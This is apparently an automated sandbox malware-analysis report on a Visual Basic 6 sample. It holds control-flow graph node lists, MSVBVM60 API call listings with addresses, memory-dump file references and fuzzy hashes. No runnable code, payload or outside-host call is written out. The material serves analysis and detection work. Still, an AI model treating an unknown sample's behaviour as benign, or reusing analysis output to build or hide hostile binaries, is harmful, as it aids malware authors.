5738->5742 5739->5740 5740->5737 5743 40cef8 __vbaExitProc 5740->5743 5744 40d741 __vbaErrorOverflow 5741->5744 5745 40d05f __vbaFreeObj 5741->5745 5742->5741 5743->5733 5746 40d750 __vbaChkstk 5744->5746 5758 40d080 5745->5758 5748 40d7a5 __vbaOnError 5746->5748 5747 40d144 __vbaCastObj __vbaObjSet 5750 40d173 5747->5750 5749 40f9a0 4 API calls 5748->5749 5752 40d7cb 5749->5752 5753 40d19e 5750->5753 5754 40d17e __vbaHresultCheckObj 5750->5754 5751 40d0bc __vbaObjSet 5751->5758 5755 40d7d6 #618 __vbaStrMove __vbaStrCmp __vbaFreeStr 5752->5755 5756 40e12a __vbaFreeStr __vbaFreeStr __vbaFreeStr __vbaFreeStr __vbaFreeStr 5752->5756 5757 40d1a8 __vbaFreeObj 5753->5757 5754->5757 5759 40d841 __vbaStrCat __vbaStrMove 5755->5759 5760 40d82a __vbaStrCopy 5755->5760 5765 40d1c7 __vbaObjSet 5757->5765 5758->5744 5758->5747 5758->5751 5762 40d0ea __vbaHresultCheckObj 5758->5762 5763 40d111 __vbaLateIdCall __vbaFreeObjList 5758->5763 5764 40d864 __vbaInStr __vbaInStr 5759->5764 5760->5764 5762->5763 5763->5758 5766 40e11d #598 5764->5766 5767 40d8ad 5764->5767 5769 40d1e5 5765->5769 5766->5756 5768 40d8cf 6 API calls 5767->5768 5773 40d8c9 __vbaSetSystemError 5767->5773 5772 404c70 5768->5772 5770 40d1f0 __vbaHresultCheckObj 5769->5770 5771 40d20d 5769->5771 5770->5771 5771->5744 5775 40d225 __vbaFreeObj 5771->5775 5774 40d93d __vbaSetSystemError __vbaRecAnsiToUni __vbaFreeStrList 5772->5774 5773->5768 5774->5766 5776 40d99c __vbaStrFixstr __vbaStrMove 5774->5776 5777 40d25b 5775->5777 5778 40ff70 14 API calls 5776->5778 5780 40d390 __vbaNew __vbaObjSet 5777->5780 5781 40d26c 5777->5781 5779 40d9c9 7 API calls 5778->5779 5782 40e1d1 __vbaErrorOverflow 5779->5782 5783 40da8b 7 API calls 5779->5783 5787 40d3bd 5780->5787 5784 40d298 __vbaObjSet 5781->5784 5785 40d27c __vbaNew2 5781->5785 5793 40e1e0 5782->5793 5786 40df09 6 API calls 5783->5786 5824 40daf3 5783->5824 5802 40d2df 5784->5802 5785->5784 5788 40df88 __vbaChkstk #689 __vbaStrMove __vbaStrCmp __vbaFreeStr 5786->5788 
5789 40e09e #598 __vbaRecUniToAnsi 5786->5789 5791 40d3e8 5787->5791 5792 40d3c8 __vbaHresultCheckObj 5787->5792 5788->5789 5794 40e028 5788->5794 5789->5824 5790 40f8f0 4 API calls 5790->5824 5795 40d3f2 __vbaFreeObj 5791->5795 5792->5795 5797 40e04a #580 __vbaStrToAnsi 5794->5797 5803 40e044 __vbaSetSystemError 5794->5803 5805 40e07b __vbaSetSystemError __vbaStrToUnicode __vbaFreeStr 5794->5805 5800 40d415 5795->5800 5797->5794 5798 40e0d5 __vbaSetSystemError __vbaRecAnsiToUni 5798->5776 5801 40e107 5798->5801 5799 4123c0 47 API calls 5804 40db1e __vbaStrMove __vbaStrCopy #616 __vbaStrMove 5799->5804 5806 40d440 5800->5806 5807 40d420 __vbaHresultCheckObj 5800->5807 5811 40e117 __vbaSetSystemError 5801->5811 5808 40d307 5802->5808 5809 40d2ea __vbaHresultCheckObj 5802->5809 5803->5797 5810 40ee70 24 API calls 5804->5810 5805->5789 5819 40d488 5806->5819 5820 40d46b __vbaHresultCheckObj 5806->5820 5807->5806 5812 40d311 __vbaObjSet 5808->5812 5809->5812 5813 40db68 __vbaStrMove __vbaStrCmp __vbaFreeStrList 5810->5813 5811->5766 5815 40d33f 5812->5815 5814 40dbbb __vbaStrCopy 5813->5814 5813->5824 5816 40ee70 24 API calls 5814->5816 5817 40d367 5815->5817 5818 40d34a __vbaHresultCheckObj 5815->5818 5822 40dbe3 __vbaStrMove __vbaStrCmp __vbaFreeStrList 5816->5822 5821 40d371 __vbaFreeObjList 5817->5821 5818->5821 5819->5744 5823 40d49e __vbaI2I4 __vbaFreeObj 5819->5823 5820->5819 5822->5824 5825 40dc2f __vbaStrCat __vbaStrMove 5822->5825 5834 40d4e9 5823->5834 5824->5789 5824->5790 5824->5798 5824->5799 5827 4128b0 65 API calls 5824->5827 5831 411d10 1112 API calls 5824->5831 5826 40fba0 30 API calls 5825->5826 5828 40dc5f __vbaFreeStr __vbaStrCat __vbaStrMove 5826->5828 5827->5824 5830 415660 145 API calls 5828->5830 5829 40d6db 5829->5744 5832 40dc9b __vbaFreeStr 5830->5832 5831->5824 5832->5824 5833 40dcbd __vbaStrCat __vbaStrMove #580 __vbaFreeStr #598 5832->5833 5835 40fba0 30 API calls 5833->5835 5834->5829 5836 40d567 5834->5836 5837 40d547 
__vbaHresultCheckObj 5834->5837 5838 40dd14 5835->5838 5839 40d571 __vbaChkstk 5836->5839 5837->5839 5840 40dd24 __vbaNew2 5838->5840 5844 40dd63 __vbaObjSet __vbaObjSet 5838->5844 5841 40d5b9 5839->5841 5840->5838 5842 40d5ea __vbaObjSet 5841->5842 5843 40d5ca __vbaHresultCheckObj 5841->5843 5849 40d646 5842->5849 5843->5842 5845 412c10 452 API calls 5844->5845 5846 40ddb4 __vbaFreeObjList #598 __vbaStrCat __vbaStrMove 5845->5846 5848 415d30 404 API calls 5846->5848 5850 40de0a __vbaFreeStr #598 __vbaStrCat __vbaStrMove 5848->5850 5851 40d651 __vbaHresultCheckObj 5849->5851 5852 40d66e 5849->5852 5853 4111a0 122 API calls 5850->5853 5855 40d678 __vbaChkstk __vbaLateIdCall __vbaFreeObjList __vbaFreeVar 5851->5855 5852->5855 5854 40de51 __vbaFreeStr 5853->5854 5854->5824 5856 40de6f #598 5854->5856 5855->5744 5857 40fba0 30 API calls 5856->5857 5858 40de8c __vbaStrCat __vbaStrMove __vbaNameFile __vbaFreeStr #580 5857->5858 5858->5824 5859 419674 __vbaFileClose __vbaFileClose 5860 41968d __vbaExitProc 5859->5860 5861 4196c2 __vbaFreeStr __vbaFreeStr __vbaFreeStr 5860->5861 6096 40edfa 6097 40ee00 __vbaFreeStr 6096->6097 6098 40ee09 __vbaFreeStrList __vbaFreeVarList 6096->6098 6097->6098 4353 408d7c 4354 40abac __vbaErrorOverflow 4353->4354 4355 408d8d 4353->4355 4356 40abc0 __vbaChkstk 4354->4356 4357 408da2 18 API calls 4355->4357 4358 4091be __vbaStrCmp 4355->4358 4360 40ac15 __vbaOnError 4356->4360 4544 410180 __vbaChkstk __vbaStrCopy __vbaAryConstruct2 __vbaOnError 4357->4544 4361 4091e0 4358->4361 4362 40948c __vbaStrCmp 4358->4362 4364 418c90 20 API calls 4360->4364 4367 4125a0 60 API calls 4361->4367 4365 409b34 __vbaStrCopy 4362->4365 4366 4094ae 4362->4366 4363 408e8c 19 API calls 4368 410180 65 API calls 4363->4368 4369 40ac50 4364->4369 4371 40ee70 24 API calls 4365->4371 4370 4125a0 60 API calls 4366->4370 4377 409203 4367->4377 4372 408fa5 7 API calls 4368->4372 4373 418c90 20 API calls 4369->4373 4374 4094c1 4370->4374 4375 409b52 __vbaStrMove 
__vbaStrCopy 4371->4375 4380 410180 65 API calls 4372->4380 4381 40ac75 4373->4381 4382 409509 __vbaStrCat #600 __vbaFreeVar __vbaNew __vbaObjSet 4374->4382 4388 40fba0 30 API calls 4374->4388 4383 40ee70 24 API calls 4375->4383 4376 40924b __vbaStrCat #600 __vbaFreeVar 4378 409298 4376->4378 4379 4092aa __vbaStrCopy 4376->4379 4377->4376 4384 40fba0 30 API calls 4377->4384 4392 4092a4 __vbaSetSystemError 4378->4392 4387 40ee70 24 API calls 4379->4387 4386 40902e 25 API calls 4380->4386 4390 409573 4382->4390 4389 409b74 13 API calls 4383->4389 4385 40921c 4384->4385 4391 415660 145 API calls 4385->4391 4393 410180 65 API calls 4386->4393 4394 4092c8 __vbaStrMove __vbaStrCopy __vbaFreeStrList 4387->4394 4395 4094da 4388->4395 4564 411590 12 API calls 4389->4564 4398 409584 __vbaHresultCheckObj 4390->4398 4399 4095a7 4390->4399 4400 409235 #580 4391->4400 4392->4379 4401 409177 __vbaFreeStrList 4393->4401 4406 409309 __vbaObjSet 4394->4406 4402 415660 145 API calls 4395->4402 4397 409c6c __vbaFreeStrList 4403 409c99 __vbaEnd 4397->4403 4404 409cab 4397->4404 4405 4095b1 __vbaFreeObj 4398->4405 4399->4405 4400->4376 4407 4094f3 #580 4402->4407 4408 409dec __vbaStrCopy 4403->4408 4409 4125a0 60 API calls 4404->4409 4412 4095d0 __vbaStrCopy 4405->4412 4413 40932e 4406->4413 4407->4382 4410 40ee70 24 API calls 4408->4410 4411 409cbe 4409->4411 4414 409e0a __vbaStrMove __vbaStrCopy 4410->4414 4411->4408 4415 409cca #535 4411->4415 4611 410fb0 __vbaRecUniToAnsi 4412->4611 4417 409362 4413->4417 4418 40933f __vbaHresultCheckObj 4413->4418 4420 40ee70 24 API calls 4414->4420 4421 40aba7 4415->4421 4422 409cea 8 API calls 4415->4422 4419 40936c 7 API calls 4417->4419 4418->4419 4593 410780 __vbaChkstk __vbaStrCopy __vbaAryConstruct2 __vbaOnError 4419->4593 4425 409e2c 7 API calls 4420->4425 4421->4421 4426 410180 65 API calls 4422->4426 4429 409ee9 __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove 4425->4429 4430 409d5a __vbaFreeStrList 4426->4430 4434 418c90 20 API calls 
4429->4434 4435 40fba0 30 API calls 4430->4435 4439 409f3c __vbaFreeStrList __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove 4434->4439 4440 409d86 #598 4435->4440 4443 418c90 20 API calls 4439->4443 4444 415660 145 API calls 4440->4444 4447 409fa2 __vbaFreeStrList 4443->4447 4448 409dac 4444->4448 4615 418a10 __vbaChkstk __vbaStrCopy __vbaStrCopy __vbaOnError __vbaStrToAnsi 4447->4615 4452 409db3 4448->4452 4453 409db5 #535 __vbaFpR4 4448->4453 4458 409dd6 #580 4452->4458 4453->4422 4453->4458 4458->4408 4660 404d50 4544->4660 4546 410204 __vbaSetSystemError __vbaRecUniToAnsi 4547 404dc4 4546->4547 4548 410254 __vbaSetSystemError __vbaRecAnsiToUni #525 __vbaStrMove 4547->4548 4553 4102ad 4548->4553 4549 4104dd 4550 4104ed FindCloseChangeNotification 4549->4550 4552 410514 __vbaFreeStr __vbaAryDestruct __vbaFreeStr __vbaFreeStr 4550->4552 4551 4102d8 __vbaSetSystemError 4551->4553 4554 41031d __vbaGenerateBoundsError 4551->4554 4552->4363 4553->4549 4553->4551 4555 410329 __vbaStrToAnsi 4553->4555 4556 410358 __vbaSetSystemError __vbaStrToUnicode __vbaFreeStr #616 __vbaStrMove 4553->4556 4563 4104aa __vbaSetSystemError __vbaRecAnsiToUni 4553->4563 4554->4555 4555->4553 4557 410b60 12 API calls 4556->4557 4558 4103b9 __vbaStrMove __vbaFreeStr __vbaLenBstr 4557->4558 4559 410480 __vbaRecUniToAnsi 4558->4559 4560 4103e9 6 API calls 4558->4560 4559->4553 4560->4559 4561 41046d 4560->4561 4562 410080 18 API calls 4561->4562 4562->4559 4563->4553 4565 411684 4564->4565 4566 411cff __vbaErrorOverflow 4564->4566 4565->4566 4567 4116a1 8 API calls 4565->4567 4568 41179f __vbaI2I4 __vbaFileClose 4565->4568 4569 40ee70 24 API calls 4567->4569 4570 411c91 __vbaFreeStr __vbaFreeStr __vbaFreeStr __vbaFreeStr __vbaFreeStr 4568->4570 4571 41171b __vbaStrMove 4569->4571 4570->4397 4573 40ee70 24 API calls 4571->4573 4574 411730 __vbaStrMove __vbaStrCmp __vbaFreeStrList 4573->4574 4575 411781 __vbaI2I4 __vbaFileClose 4574->4575 4576 411772 4574->4576 4575->4570 4576->4566 4577 

Control-flow Graph

APIs
• __vbaChkstk.MSVBVM60(00000000,004025E6,?,?,?,?,00409D5A,00000000), ref: 0041019E
• __vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6), ref: 004101CE
• __vbaAryConstruct2.MSVBVM60(?,004068A0,00000003,?,?,?,00000000,004025E6), ref: 004101DF
• __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004025E6), ref: 004101EE
• __vbaSetSystemError.MSVBVM60(0000000F,00000000,?,?,?,00000000,004025E6), ref: 0041020A
• __vbaRecUniToAnsi.MSVBVM60(00404B50,?,00000128), ref: 00410244
• __vbaSetSystemError.MSVBVM60(?,00000000), ref: 0041025A
• __vbaRecAnsiToUni.MSVBVM60(00404B50,00000128,?), ref: 00410273
• #525.MSVBVM60(00000104), ref: 0041029C
• __vbaStrMove.MSVBVM60 ref: 004102A7
• __vbaSetSystemError.MSVBVM60(00000410,00000000,?), ref: 004102DE
• __vbaGenerateBoundsError.MSVBVM60 ref: 0041031D
• __vbaStrToAnsi.MSVBVM60(?,?,000001F4), ref: 00410338
• __vbaSetSystemError.MSVBVM60(?,?,00000000), ref: 0041035E
• __vbaStrToUnicode.MSVBVM60(?,?,?,00000000), ref: 0041036F
• __vbaFreeStr.MSVBVM60(?,00000000), ref: 00410384
• #616.MSVBVM60(?,?,?,00000000), ref: 00410399
• __vbaStrMove.MSVBVM60(?,00000000), ref: 004103A7
• __vbaStrMove.MSVBVM60(?,?,00000000), ref: 004103BE
• __vbaFreeStr.MSVBVM60(?,00000000), ref: 004103CA
• __vbaLenBstr.MSVBVM60(?,?,00000000), ref: 004103DB
• __vbaStrCat.MSVBVM60(?,0040614C,?,00000001,?,00000000), ref: 00410402
• __vbaStrMove.MSVBVM60(?,00000000), ref: 00410410
• __vbaStrCat.MSVBVM60(0040614C,00000000,?,00000000), ref: 0041041C
• __vbaStrMove.MSVBVM60(?,00000000), ref: 0041042A
• __vbaInStr.MSVBVM60(00000001,00000000,?,00000000), ref: 00410433
• __vbaFreeStrList.MSVBVM60(00000002,?,?,?,00000000), ref: 00410459
• __vbaRecUniToAnsi.MSVBVM60(00404B50,?,00000128,?,00000000), ref: 0041049A
• __vbaSetSystemError.MSVBVM60(?,00000000,?,00000000), ref: 004104B0
• __vbaRecAnsiToUni.MSVBVM60(00404B50,00000128,?,?,00000000), ref: 004104C9
• FindCloseChangeNotification.KERNELBASE(?), ref: 004104ED
• __vbaFreeStr.MSVBVM60(0041054B), ref: 00410517
• __vbaAryDestruct.MSVBVM60(00000000,?), ref: 0041052F
• __vbaFreeStr.MSVBVM60 ref: 00410538
• __vbaFreeStr.MSVBVM60 ref: 00410544

Memory Dump Source
• Source File: 00000000.00000002.463478599.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.463467976.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.463474179.0000000000401000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.463709716.000000000041B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.463726077.000000000041D000.00000080.00000001.01000000.00000003.sdmp

Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_sJ9Q8UWMAX.jbxd

Yara matches

Similarity
• API ID: __vba$Error$Free$AnsiMoveSystem$#525#616BoundsBstrChangeChkstkCloseConstruct2CopyDestructFindGenerateListNotificationUnicode
• String ID:
• API String ID: 1228785046-0
• Opcode ID: 0e7fc902b34ffcf9e67cdb1769bf0c1f0fb471222fd1f6da1b4fc70dbbb803ea
• Instruction ID: ed4df61ca57589e4cb6a89f15fcf2a92bf343cb87a1231b53511e749ac9c114a
• Opcode Fuzzy Hash: 0e7fc902b34ffcf9e67cdb1769bf0c1f0fb471222fd1f6da1b4fc70dbbb803ea
• Instruction Fuzzy Hash: D9A13EB5901218DFDB14DFA0DE4DBDEB7B4BB48304F1081A9E50AB72A0DB745A84CF54

Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph

[Control-flow graph not reproduced. Legend: Executed / Not Executed]

APIs
  • Part of subcall function 0040EE70: __vbaLenBstr.MSVBVM60(00000000), ref: 0040EEAD
  • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,?), ref: 0040EEF8
  • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,?), ref: 0040EF03
  • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,?), ref: 0040EF0A
  • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,?), ref: 0040EF68
  • Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,?), ref: 0040EF71
  • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,00000002,?,?,?), ref: 0040EFA1
  • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,?), ref: 0040EFAC
  • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,00000002,?,?,?), ref: 0040EFB3
• __vbaStrMove.MSVBVM60(?), ref: 00408C5A
• __vbaStrCopy.MSVBVM60 ref: 00408C67
• __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 00408C77
• __vbaStrCopy.MSVBVM60 ref: 00408C8F
  • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,?), ref: 0040F00F
  • Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,?), ref: 0040F018
  • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F049
  • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F054
                                                                                                                                                                                    • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F05B
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0AF
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0B8
                                                                                                                                                                                    • Part of subcall function 0040EE70: #537.MSVBVM60(-0000000C,?,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0F3
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F104
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaStrCat.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F107
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F112
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F117
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?), ref: 00408CA3
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 00408CB0
                                                                                                                                                                                  • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 00408CC0
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 00408CD8
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaStrCopy.MSVBVM60 ref: 0040F13C
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(0040F175), ref: 0040F16E
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?), ref: 00408CEC
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 00408CF9
                                                                                                                                                                                  • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 00408D09
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 00408D21
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?), ref: 00408D35
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 00408D42
                                                                                                                                                                                  • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 00408D52
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000,0040614C), ref: 00408DB5
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00408DC0
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00408DCE
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00408DD9
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(0040614C,00000000), ref: 00408DE5
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00408DF0
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00408DFD
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00408E08
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00408E16
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00408E21
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(0040614C,00000000), ref: 00408E2D
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00408E38
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00408E46
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00408E51
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00408E5E
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00408E69
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(0040614C,00000000), ref: 00408E75
                                                                                                                                                                                  • __vbaFreeStrList.MSVBVM60(00000009,?,?,?,?,?,?,?,?,?,00000000), ref: 00408EB2
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000,0040614C), ref: 00408ECE
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00408ED9
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00408EE7
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00408EF2
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(0040614C,00000000), ref: 00408EFE
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00408F09
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00408F16
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00408F21
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00408F2F
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00408F3A
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(0040614C,00000000), ref: 00408F46
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00408F51
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00408F5F
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00408F6A
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00408F77
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00408F82
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(0040614C,00000000), ref: 00408F8E
                                                                                                                                                                                  • __vbaFreeStrList.MSVBVM60(00000009,?,?,?,?,?,?,?,?,?,00000000), ref: 00408FCB
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000,0040614C), ref: 00408FE7
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00408FF2
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00409000
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 0040900B
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(0040614C,00000000), ref: 00409017
                                                                                                                                                                                  • __vbaFreeStrList.MSVBVM60(00000003,?,?,?,00000000), ref: 0040903C
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000,0040614C), ref: 00409057
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00409062
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00409070
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 0040907B
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(0040614C,00000000), ref: 00409087
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00409092
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 004090A0
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 004090AB
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 004090B8
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 004090C3
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(0040614C,00000000), ref: 004090CF
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 004090DA
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 004090E8
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 004090F3
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00409101
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 0040910C
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(0040614C,00000000), ref: 00409118
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00409123
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00409130
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 0040913B
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00409149
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00409154
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(0040614C,00000000), ref: 00409160
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 0040916B
                                                                                                                                                                                  • __vbaFreeStrList.MSVBVM60(0000000C,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004091A9
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00409022
                                                                                                                                                                                    • Part of subcall function 00410180: FindCloseChangeNotification.KERNELBASE(?), ref: 004104ED
                                                                                                                                                                                    • Part of subcall function 00410180: __vbaFreeStr.MSVBVM60(0041054B), ref: 00410517
                                                                                                                                                                                    • Part of subcall function 00410180: __vbaAryDestruct.MSVBVM60(00000000,?), ref: 0041052F
                                                                                                                                                                                    • Part of subcall function 00410180: __vbaFreeStr.MSVBVM60 ref: 00410538
                                                                                                                                                                                    • Part of subcall function 00410180: __vbaFreeStr.MSVBVM60 ref: 00410544
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00408F99
                                                                                                                                                                                    • Part of subcall function 00410180: __vbaGenerateBoundsError.MSVBVM60 ref: 0041031D
                                                                                                                                                                                    • Part of subcall function 00410180: __vbaSetSystemError.MSVBVM60(?,?,00000000), ref: 0041035E
                                                                                                                                                                                    • Part of subcall function 00410180: __vbaStrToUnicode.MSVBVM60(?,?,?,00000000), ref: 0041036F
                                                                                                                                                                                    • Part of subcall function 00410180: __vbaFreeStr.MSVBVM60(?,00000000), ref: 00410384
                                                                                                                                                                                    • Part of subcall function 00410180: #616.MSVBVM60(?,?,?,00000000), ref: 00410399
                                                                                                                                                                                    • Part of subcall function 00410180: __vbaStrMove.MSVBVM60(?,00000000), ref: 004103A7
                                                                                                                                                                                    • Part of subcall function 00410180: __vbaStrMove.MSVBVM60(?,?,00000000), ref: 004103BE
                                                                                                                                                                                    • Part of subcall function 00410180: __vbaFreeStr.MSVBVM60(?,00000000), ref: 004103CA
                                                                                                                                                                                    • Part of subcall function 00410180: __vbaLenBstr.MSVBVM60(?,?,00000000), ref: 004103DB
                                                                                                                                                                                    • Part of subcall function 00410180: __vbaStrCat.MSVBVM60(?,0040614C,?,00000001,?,00000000), ref: 00410402
                                                                                                                                                                                    • Part of subcall function 00410180: __vbaStrMove.MSVBVM60(?,00000000), ref: 00410410
                                                                                                                                                                                    • Part of subcall function 00410180: __vbaStrCat.MSVBVM60(0040614C,00000000,?,00000000), ref: 0041041C
                                                                                                                                                                                    • Part of subcall function 00410180: __vbaStrMove.MSVBVM60(?,00000000), ref: 0041042A
                                                                                                                                                                                    • Part of subcall function 00410180: __vbaInStr.MSVBVM60(00000001,00000000,?,00000000), ref: 00410433
                                                                                                                                                                                    • Part of subcall function 00410180: __vbaFreeStrList.MSVBVM60(00000002,?,?,?,00000000), ref: 00410459
                                                                                                                                                                                    • Part of subcall function 00410180: __vbaRecUniToAnsi.MSVBVM60(00404B50,?,00000128,?,00000000), ref: 0041049A
                                                                                                                                                                                    • Part of subcall function 00410180: __vbaSetSystemError.MSVBVM60(?,00000000,?,00000000), ref: 004104B0
                                                                                                                                                                                    • Part of subcall function 00410180: __vbaRecAnsiToUni.MSVBVM60(00404B50,00000128,?,?,00000000), ref: 004104C9
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00408E80
                                                                                                                                                                                    • Part of subcall function 00410180: __vbaChkstk.MSVBVM60(00000000,004025E6,?,?,?,?,00409D5A,00000000), ref: 0041019E
                                                                                                                                                                                    • Part of subcall function 00410180: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6), ref: 004101CE
                                                                                                                                                                                    • Part of subcall function 00410180: __vbaAryConstruct2.MSVBVM60(?,004068A0,00000003,?,?,?,00000000,004025E6), ref: 004101DF
                                                                                                                                                                                    • Part of subcall function 00410180: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004025E6), ref: 004101EE
                                                                                                                                                                                    • Part of subcall function 00410180: __vbaSetSystemError.MSVBVM60(0000000F,00000000,?,?,?,00000000,004025E6), ref: 0041020A
                                                                                                                                                                                    • Part of subcall function 00410180: __vbaRecUniToAnsi.MSVBVM60(00404B50,?,00000128), ref: 00410244
